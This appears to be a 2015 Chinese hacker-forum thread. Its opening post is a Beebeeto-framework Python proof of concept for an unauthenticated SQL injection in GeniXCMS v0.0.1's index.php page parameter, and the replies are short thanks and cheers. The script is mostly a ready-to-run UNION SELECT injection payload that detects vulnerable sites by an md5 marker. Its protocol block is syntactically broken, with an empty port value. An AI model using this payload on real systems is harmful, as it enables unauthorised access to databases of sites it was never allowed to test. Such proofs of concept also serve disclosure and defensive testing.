C4r1st 发表于 2015-3-19 17:04:05

GeniXCMS v0.0.1 /index.php SQL注入漏洞 POC

#!/usr/bin/env python
# coding=utf-8

"""
Site: http://www.beebeeto.com/
Framework: https://github.com/ff0000team/Beebeeto-framework
"""

import requests

from baseframe import BaseFrame


class MyPoc(BaseFrame):
    poc_info = {
      # poc相关信息
      'poc': {
            'id': 'poc-2015-0067',
            'name': 'GeniXCMS v0.0.1 /index.php SQL INJECTION POC',
            'author': 'ca2fux1n',
            'create_date': '2015-03-11',
      },
      # 协议相关信息
      'protocol': {
            'name': 'http',
            'port': ,
            'layer3_protocol': ['tcp'],
      },
      # 漏洞相关信息
      'vul': {
            'app_name': 'GeniXCMS',
            'vul_version': ['0.0.1'],
            'type': 'SQL Injection',
            'tag': ['GeniXCMS SQL注入漏洞', '/index.php漏洞', 'php'],
            'desc': 'GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploite',
            'references': ['http://www.exploit-db.com/exploits/36321/',
                           ],
      },
    }

    @classmethod
    def verify(cls, args):
      url = args['options']['target']
      payload = "/genixcms/index.php?page=1' UNION ALL SELECT 1,2,md5('bb2'),4,5,6,7,8,9,10 and 'j'='j"
      verify_url = url + payload
      content = requests.get(verify_url).content
      if args['options']['verbose']:
            print '[*] Request URL: ' + verify_url
      if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:
            args['options']['success'] = True
            args['poc_ret']['vul_url'] = verify_url
      return args

    exploit = verify

if __name__ == '__main__':
    from pprint import pprint

    mp = MyPoc()
    pprint(mp.run())

风之琳 发表于 2015-4-13 16:12:32

谢谢分享

r00tc4 发表于 2015-6-28 04:19:17

支持,看起来不错呢!

arctic 发表于 2015-6-29 13:30:41

学习学习技术,加油!

wilist 发表于 2015-6-29 19:54:40

还是不错的哦,顶了

CHRIS 发表于 2015-6-30 01:52:06

学习学习技术,加油!

HUC-参谋长 发表于 2015-6-30 03:31:10

支持中国红客联盟(ihonker.org)

asion 发表于 2015-6-30 12:38:15

还是不错的哦,顶了

Sty,涛 发表于 2015-6-30 15:14:49

支持中国红客联盟(ihonker.org)

Jack-5 发表于 2015-7-2 02:50:49

学习学习技术,加油!
页: [1]
查看完整版本: GeniXCMS v0.0.1 /index.php SQL注入漏洞 POC